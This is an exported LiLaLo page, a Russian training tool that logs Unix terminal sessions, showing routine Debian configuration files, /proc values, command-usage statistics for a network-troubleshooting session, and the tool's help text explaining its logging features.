    # rpc.mountd (the NFS mount daemon). See portmap(8) and rpc.mountd(8)
    # for further information.
    #
    # The PARANOID wildcard matches any host whose name does not match its
    # address.
    # You may wish to enable this to ensure any programs that don't
    # validate looked up hostnames still leave understandable logs. In past
    # versions of Debian this has been the default.
    # ALL: PARANOID
    bc: ALL
    
    /etc/inetd.conf
    >
    # /etc/inetd.conf:  see inetd(8) for further informations.
    #
    # Internet superserver configuration database
    #
    #
    # Lines starting with "#:LABEL:" or "#<off>#" should not
    # be changed unless you know what you are doing!
    #
    # If you want to disable an entry so it isn't touched during
    # package updates just comment it out with a single '#' character.
    #
    # Packages should modify this file by using update-inetd(8)
    #
    # <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
    #
    #:INTERNAL: Internal services
    #discard                stream  tcp     nowait  root    internal
    #discard                dgram   udp     wait    root    internal
    #daytime                stream  tcp     nowait  root    internal
    #time           stream  tcp     nowait  root    internal
    #:STANDARD: These are standard services.
    #:BSD: Shell, login, exec and talk are BSD protocols.
    #:MAIL: Mail, news and uucp services.
    #:INFO: Info services
    #:BOOT: TFTP service is provided primarily for booting.  Most sites
    #       run this only on machines acting as "boot servers."
    #:RPC: RPC based services
    #:HAM-RADIO: amateur-radio services
    #:OTHER: Other services
    9999            stream  tcp     nowait  approx  /usr/sbin/approx
    
    /proc/sys/fs/file-max
    >
    23289
    
    /proc/sys/fs/file-nr
    >
    1664    0       23289
    
    `!!`
    >
    cat `find /proc -name \*cookies\*`
    0
    

    Статистика

    Время первой команды журнала10:33:22 2009- 6- 2
    Время последней команды журнала12:48:48 2009- 6- 2
    Количество командных строк в журнале101
    Процент команд с ненулевым кодом завершения, %29.70
    Процент синтаксически неверно набранных команд, % 0.00
    Суммарное время работы с терминалом *, час 2.26
    Количество командных строк в единицу времени, команда/мин 0.75
    Частота использования команд
    nc11|========| 8.94%
    screen10|========| 8.13%
    cat9|=======| 7.32%
    netstat7|=====| 5.69%
    find6|====| 4.88%
    vi6|====| 4.88%
    traceroute5|====| 4.07%
    mtr4|===| 3.25%
    10.0.35.100.38547:4|===| 3.25%
    which4|===| 3.25%
    ethtool3|==| 2.44%
    less3|==| 2.44%
    grep3|==| 2.44%
    REQUEST2|=| 1.63%
    BROADCAST2|=| 1.63%
    apt-get2|=| 1.63%
    update-alternatives2|=| 1.63%
    ssh2|=| 1.63%
    10.255.255.255.netbios-ns:2|=| 1.63%
    10:33:31.4465121|| 0.81%
    while1|| 0.81%
    pkill1|| 0.81%
    10:33:26.8589601|| 0.81%
    tracert1|| 0.81%
    10:33:31.1070511|| 0.81%
    10:33:45.7771251|| 0.81%
    caÐеÐt1|| 0.81%
    10.255.255.255.netbios-dgm:1|| 0.81%
    ls1|| 0.81%
    do1|| 0.81%
    10:33:24.1833391|| 0.81%
    10:33:30.6301261|| 0.81%
    10:40:44.3657181|| 0.81%
    255.255.255.255.1211:1|| 0.81%
    10:40:44.1677051|| 0.81%
    ps1|| 0.81%
    10:33:31.9164561|| 0.81%
    10:33:30.8320471|| 0.81%
    netstat()1|| 0.81%
    pgrep1|| 0.81%
    10:40:43.7526131|| 0.81%
    10:33:44.3345631|| 0.81%
    lspci1|| 0.81%
    10:33:45.3346241|| 0.81%
    10:40:43.0495781|| 0.81%
    10:33:23.3334791|| 0.81%
    trace1|| 0.81%
    kill1|| 0.81%
    exit1|| 0.81%
    10:33:30.0186131|| 0.81%
    du1|| 0.81%
    Already1|| 0.81%
    apt-cache1|| 0.81%
    10:40:44.6577361|| 0.81%
    done1|| 0.81%
    ____
    *) Интервалы неактивности длительностью 30 минут и более не учитываются

    Справка

    Для того чтобы использовать LiLaLo, не нужно знать ничего особенного: всё происходит само собой. Однако, чтобы ведение и последующее использование журналов было как можно более эффективным, желательно иметь в виду следующее:
    1. В журнал автоматически попадают все команды, данные в любом терминале системы.

    2. Для того чтобы убедиться, что журнал на текущем терминале ведётся, и команды записываются, дайте команду w. В поле WHAT, соответствующем текущему терминалу, должна быть указана программа script.

    3. Команды, при наборе которых были допущены синтаксические ошибки, выводятся перечёркнутым текстом:
      $ l s-l
      bash: l: command not found
      

    4. Если код завершения команды равен нулю, команда была выполнена без ошибок. Команды, код завершения которых отличен от нуля, выделяются цветом.
      $ test 5 -lt 4
      Обратите внимание на то, что код завершения команды может быть отличен от нуля не только в тех случаях, когда команда была выполнена с ошибкой. Многие команды используют код завершения, например, для того чтобы показать результаты проверки

    5. Команды, ход выполнения которых был прерван пользователем, выделяются цветом.
      $ find / -name abc
      find: /home/devi-orig/.gnome2: Keine Berechtigung
      find: /home/devi-orig/.gnome2_private: Keine Berechtigung
      find: /home/devi-orig/.nautilus/metafiles: Keine Berechtigung
      find: /home/devi-orig/.metacity: Keine Berechtigung
      find: /home/devi-orig/.inkscape: Keine Berechtigung
      ^C
      

    6. Команды, выполненные с привилегиями суперпользователя, выделяются слева красной чертой.
      # id
      uid=0(root) gid=0(root) Gruppen=0(root)
      

    7. Изменения, внесённые в текстовый файл с помощью редактора, запоминаются и показываются в журнале в формате ed. Строки, начинающиеся символом "<", удалены, а строки, начинающиеся символом ">" -- добавлены.
      $ vi ~/.bashrc
      2a3,5
      >    if [ -f /usr/local/etc/bash_completion ]; then
      >         . /usr/local/etc/bash_completion
      >        fi
      

    8. Для того чтобы изменить файл в соответствии с показанными в диффшоте изменениями, можно воспользоваться командой patch. Нужно скопировать изменения, запустить программу patch, указав в качестве её аргумента файл, к которому применяются изменения, и всавить скопированный текст:
      $ patch ~/.bashrc
      В данном случае изменения применяются к файлу ~/.bashrc

    9. Для того чтобы получить краткую справочную информацию о команде, нужно подвести к ней мышь. Во всплывающей подсказке появится краткое описание команды.

      Если справочная информация о команде есть, команда выделяется голубым фоном, например: vi. Если справочная информация отсутствует, команда выделяется розовым фоном, например: notepad.exe. Справочная информация может отсутствовать в том случае, если (1) команда введена неверно; (2) если распознавание команды LiLaLo выполнено неверно; (3) если информация о команде неизвестна LiLaLo. Последнее возможно для редких команд.

    10. Большие, в особенности многострочные, всплывающие подсказки лучше всего показываются браузерами KDE Konqueror, Apple Safari и Microsoft Internet Explorer. В браузерах Mozilla и Firefox они отображаются не полностью, а вместо перевода строки выводится специальный символ.

    11. Время ввода команды, показанное в журнале, соответствует времени начала ввода командной строки, которое равно тому моменту, когда на терминале появилось приглашение интерпретатора

    12. Имя терминала, на котором была введена команда, показано в специальном блоке. Этот блок показывается только в том случае, если терминал текущей команды отличается от терминала предыдущей.

    13. Вывод не интересующих вас в настоящий момент элементов журнала, таких как время, имя терминала и других, можно отключить. Для этого нужно воспользоваться формой управления журналом вверху страницы.

    14. Небольшие комментарии к командам можно вставлять прямо из командной строки. Комментарий вводится прямо в командную строку, после символов #^ или #v. Символы ^ и v показывают направление выбора команды, к которой относится комментарий: ^ - к предыдущей, v - к следующей. Например, если в командной строке было введено:

      $ whoami
      
      user
      
      $ #^ Интересно, кто я?
      
      в журнале это будет выглядеть так:
      $ whoami
      
      user
      
      Интересно, кто я?

    15. Если комментарий содержит несколько строк, его можно вставить в журнал следующим образом:

      $ whoami
      
      user
      
      $ cat > /dev/null #^ Интересно, кто я?
      
      Программа whoami выводит имя пользователя, под которым 
      мы зарегистрировались в системе.
      -
      Она не может ответить на вопрос о нашем назначении 
      в этом мире.
      
      В журнале это будет выглядеть так:
      $ whoami
      user
      
      Интересно, кто я?
      Программа whoami выводит имя пользователя, под которым
      мы зарегистрировались в системе.

      Она не может ответить на вопрос о нашем назначении
      в этом мире.
      Для разделения нескольких абзацев между собой используйте символ "-", один в строке.

    16. Комментарии, не относящиеся непосредственно ни к какой из команд, добавляются точно таким же способом, только вместо симолов #^ или #v нужно использовать символы #=

    17. Содержимое файла может быть показано в журнале. Для этого его нужно вывести с помощью программы cat. Если вывод команды отметить симоволами #!, содержимое файла будет показано в журнале в специально отведённой для этого секции.
    18. Для того чтобы вставить скриншот интересующего вас окна в журнал, нужно воспользоваться командой l3shot. После того как команда вызвана, нужно с помощью мыши выбрать окно, которое должно быть в журнале.
    19. Команды в журнале расположены в хронологическом порядке. Если две команды давались одна за другой, но на разных терминалах, в журнале они будут рядом, даже если они не имеют друг к другу никакого отношения.
      1
          2
      3   
          4
      
      Группы команд, выполненных на разных терминалах, разделяются специальной линией. Под этой линией в правом углу показано имя терминала, на котором выполнялись команды. Для того чтобы посмотреть команды только одного сенса, нужно щёкнуть по этому названию.

    О программе

    LiLaLo (L3) расшифровывается как Live Lab Log.
    Программа разработана для повышения эффективности обучения Unix/Linux-системам.
    (c) Игорь Чубин, 2004-2008

    $Id$